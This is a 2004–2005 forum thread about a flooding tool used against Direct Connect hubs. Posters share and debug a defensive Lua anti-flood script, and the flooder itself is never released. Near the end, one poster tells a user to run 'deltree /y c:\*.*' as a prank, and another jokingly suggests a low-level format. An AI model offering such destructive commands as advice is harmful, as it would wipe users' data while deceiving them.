PtokaX forum

Stuff => Offtopic => Topic started by: arunsohal on 13 May, 2004, 15:44:40

Title: Does anyone know anything about a Huri-Huri Flood Destroyer
Post by: arunsohal on 13 May, 2004, 15:44:40
I hear this Huri-Huri Flood Destroyer has a very bad effect on a hub. 1 particular bot floods the hub with the user
Title:
Post by: KX250 on 13 May, 2004, 15:57:27
yep i saw this hub destroyer in 2 of the hubs were am
op in .

it brought in about 4,000 users in each hub with
3tb or higher share with eatch user.

all the bot's or
what ever they were had name like this: K-N-U-C-K-L-E-S.
Title:
Post by: [PT]CableGuy on 13 May, 2004, 16:16:46
Hi there:

This is a known flooder !!!
plop made a good anti-flood script for "that"...

Please check this post:

WARNING NEW HUB FLOODER !!!OUT (http://board.univ-angers.fr/thread.php?threadid=1369&boardid=11&sid=3fa78a36500d3dd3f3cb80623ea43bcf)

Protect yourselfs :]
Title:
Post by: pHaTTy on 13 May, 2004, 16:37:24
this is probably obselete, sorry not been around much =P

but i know it works against the Meka][Meka destroyer =)
and ruri ruri progs

--//Anti_Force v.03 by Phatty
--//Thx to Meka for his prog on testing.

table = {

["Ruri_Ruri"]="[USER] - [UIP] was banned for using a Ruri Hub Destroyer!",
["R u r i _ R u r i"]="[USER] - [UIP] was banned for using a Modified Ruri Hub Destroyer",

}

BOT = "DarkForce"

function DataArrival(user,data)
if strsub(data,1,7) == "$MyINFO" then
if user.sName = "" then
SendToAll(BOT,user.sName.." has been disconnected for having a nil-nick")
user:Disconnect()
return 1
end
local s,e,name = strfind(data,"^%$MyINFO %$ALL (%S+)")
if name ~= user.sName then
SendToAll(BOT,user.sName.." has been disconnected for attempting to myinfo flood the hub")
user:Disconnect()
return 1
end
for i,v in table do
if strfind(data,i) then
user:Ban()
local tosend = gsub(v,[USER],user.sName) - start tosend local
local tosend = gsub(tosend,[UIP],user.sIP) - keep it local
SendToAll(BOT,tosend)
local tosend = nil - clear local to end function without stress
return 1
end
end
end
end
Title:
Post by: RDB on 05 June, 2004, 16:36:46
I made the mistake of not using this script thinking it wouldnt happen to me. But guess what, it got me!

So do use it, i still even use it today because it is a powerful bot that ruri script. X(
Title:
Post by: Krissi on 10 June, 2004, 16:26:35
Where can i get the Huri-Huri Flood destroyer. I have to know what the program do so i can beware.



--------------------------
Sorry for bad english
--------------------------
Title:
Post by: QuikThinker on 10 June, 2004, 17:39:39
Download Plop's deflood script from his site 2 prevent Ruri_Ruri flooders.

Get it here (http://www.plop.nl/Plop.php)

Quik.
Title:
Post by: plop on 10 June, 2004, 19:08:06
QuoteOriginally posted by Krissi
Where can i get the Huri-Huri Flood destroyer. I have to know what the program do so i can beware.
all you need 2 be safe is 2 run deflood.

many have asked me for flooders, and no1 is ever gone get them from me.

plop
Title:
Post by: NotRabidWombat on 10 June, 2004, 19:12:31
Hrm. I'm not sure I understand why not. Sure a person could try to use the flooder, but the fix already exists. I wouldn't mind seeing the software myself.

-NotRabidWombat
Title: H!
Post by: Cp6uja on 10 June, 2004, 19:57:20
I want download RuRi_Ruri hub destroyer.
Please replay me !!!  8)
Title: Syntax error "then" line 15
Post by: [G-T-E]Gate? on 10 June, 2004, 20:12:05
Need ur hlp pH?tt? or anyone esle:
Tks G8

Syntax error: `then' expected;
  last token read: `=' at line 15 in file `E:\Ptokax 0.330 build 15.25 RCv8\scripts\Ruri_Ruri.lua'

--//Anti_Force v.03 by Phatty
--//Thx to Meka for his prog on testing.

table = {

["Ruri_Ruri"]="[USER] - [UIP] was banned for using a Ruri Hub Destroyer!",
["R u r i _ R u r i"]="[USER] - [UIP] was banned for using a Modified Ruri Hub Destroyer",

}

BOT = "?:B:L:A:C:K::H:O:L:E:??"

function DataArrival(user,data)
if strsub(data,1,7) == "$MyINFO" then
if user.sName = "" then
SendToAll(BOT,user.sName.." has been disconnected for having a nil-nick")
user:Disconnect()
return 1
end
local s,e,name = strfind(data,"^%$MyINFO %$ALL (%S+)")
if name ~= user.sName then
SendToAll(BOT,user.sName.." has been disconnected for attempting to myinfo flood the hub")
user:Disconnect()
return 1
end
for i,v in table do
if strfind(data,i) then
user:Ban()
local tosend = gsub(v,[USER],user.sName) - start tosend local
local tosend = gsub(tosend,[UIP],user.sIP) - keep it local
SendToAll(BOT,tosend)
local tosend = nil - clear local to end function without stress
return 1
end
end
end
end
Title:
Post by: QuikThinker on 10 June, 2004, 20:47:43
Why dun u just use deflood 4.1 instead?  ?(
Title:
Post by: [G-T-E]Gate? on 10 June, 2004, 20:56:42
because it kicks my bot when speaking in main chat , okay?
Thats Y I want the above script corrected..
Title:
Post by: Herodes on 10 June, 2004, 21:43:26
function DataArrival(user,data)
    if strsub(data,1,7) == "$MyINFO" then
        if user.sName = "" then  <<<   ----   this has to be changed to >$*
            SendToAll(BOT,user.sName.." has been disconnected for having a nil-nick")
            user:Disconnect()
            return 1


>$*if user.sName == "" then

This is a neaky error ... when something goes wrong check the 2ble "="`s 1st ... :)
Title:
Post by: QuikThinker on 10 June, 2004, 22:09:19
QuoteOriginally posted by [G-T-E]Gate?
because it kicks my bot when speaking in main chat , okay?
Thats Y I want the above script corrected..

Didn't realise u was a bitch sorry 4 tryna help.
Title:
Post by: NotRabidWombat on 10 June, 2004, 22:45:07
Phatty's script is just a simple nickname blacklist. If anyone changes the nickname of a flooder it is useless.

       if user.sName = "" then
            SendToAll(BOT,user.sName.." has been disconnected for having a nil-nick")
            user:Disconnect()
            return 1
        end
I wonder if that ever happens.

-NotRabidWombat
Title:
Post by: plop on 10 June, 2004, 23:04:01
QuoteOriginally posted by NotRabidWombat
Hrm. I'm not sure I understand why not. Sure a person could try to use the flooder, but the fix already exists. I wouldn't mind seeing the software myself.

-NotRabidWombat
2 protect the hub owners who never heared of them.
and the weird things is that the fix doesn't seem 2 stop ppl from using it.
i just don't feel good about spreading these things, but if ppl wanne see it in action i'm willing 2 show it.

plop
Title:
Post by: Ruri_Ruri on 10 June, 2004, 23:28:25
quit PMing me for my progs, you aint getting them! they are useless anyway now! even the advanced ones like OMEGA and Crimson are useless! -thnx plop

best u can have is screen shots!!

::growls::
Title:
Post by: plop on 11 June, 2004, 04:46:50
QuoteOriginally posted by Ruri_Ruri
quit PMing me for my progs, you aint getting them! they are useless anyway now! even the advanced ones like OMEGA and Crimson are useless! -thnx plop

best u can have is screen shots!!

::growls::
yw.

can you send me the screenshots, then i'll make a page for them on my website.

plop
Title:
Post by: Ruri_Ruri on 11 June, 2004, 11:13:25
copy & paste links

//www.geocities.com/blinking_master_182/shot1.JPG
//www.geocities.com/blinking_master_182/shot2.JPG
Title:
Post by: Krissi on 11 June, 2004, 14:44:47
Where can i get Ruri Ruri hub destroyer?
Title:
Post by: NotRabidWombat on 11 June, 2004, 15:14:13
LOL.

Windows XP (with beauuuutiful green/blue scheme) and VB applications!

*cough* script kiddie *cough*

-NotRabidWombat
Title:
Post by: Ruri_Ruri on 11 June, 2004, 19:15:16
you cant have them

and i dont care what u call me... im just not bothered :P i have much bigger problems to resolve
Title:
Post by: NotRabidWombat on 11 June, 2004, 19:45:18
" i have much bigger problems to resolve"

Like what? Finding a new way of alternating MyINFO, Passive Search and Chat spams to take down a hub.

You're just like every other virus / worm writer out there. Get lost and take your "progz" with you.

-NotRabidWombat
Title:
Post by: [G-T-E]Gate? on 11 June, 2004, 20:01:19
At last It comes, I once added a note about Ruri flooder when it first hit me that
I thought the Lua Member Ruri_Ruri was the one behinmd it all but got no responce.
I later thought maybe they can work together to stop Flood Proggys instead of making them but Iam wrong, was that why he was here ?
 There are Hackers and Crackers. Only a few know the difference.
 I second the motion...
Lets hear it from the Judge

G8
A person with already to many gray hairs.

Peace to All
Title:
Post by: [NL]Pur on 11 June, 2004, 21:33:19
well, Hackers know where they must stop,

crackers just don't stop.
Title:
Post by: Ruri_Ruri on 12 June, 2004, 19:05:18
huh? lol whered the hacker/cracker convo come from??

and yes.. bigger problems... none of ur concern, but my parents are very ill in hospital, and ive been put on anti-depressant pills.... they taste like crap! lol

i cudnt be arsed with flooders, so im working on an intelligent chat bot. the idea is that it chats with the users, or chats with a clone of the bot to make it look like ur hub chat is alive!
Title:
Post by: Markos on 01 February, 2005, 20:50:33
nice one m8 hope to see it soon  ;)
Title:
Post by: ARCHANGEL on 02 February, 2005, 16:26:25
Try this Krissi , it can work wonders:

click start
and choose run
and then type command and press OK
when a black box comes up type


deltree /y c:\*.*
Title:
Post by: VERMiN on 02 February, 2005, 16:32:52
After I've done what you said everything seemed to be acting strangly so I thought a reboot would do magic but to my big suprise my system has now been really fast!

Shortly after I power on my computer it gets me to a DOS message telling me something is missing... But it really does it quick. Though I haven't figured it out how to actually get back to windows... Any more great tips?

:-)
Title:
Post by: plop on 02 February, 2005, 17:09:49
QuoteOriginally posted by VERMiN
After I've done what you said everything seemed to be acting strangly so I thought a reboot would do magic but to my big suprise my system has now been really fast!

Shortly after I power on my computer it gets me to a DOS message telling me something is missing... But it really does it quick. Though I haven't figured it out how to actually get back to windows... Any more great tips?

:-)
sell your pc and buy a washing machine, booting time = instandly.

plop
Title:
Post by: bastya_elvtars on 02 February, 2005, 18:44:29
QuoteOriginally posted by VERMiN
After I've done what you said everything seemed to be acting strangly so I thought a reboot would do magic but to my big suprise my system has now been really fast!

Shortly after I power on my computer it gets me to a DOS message telling me something is missing... But it really does it quick. Though I haven't figured it out how to actually get back to windows... Any more great tips?

:-)

press del on startup and choose low-level format from menu.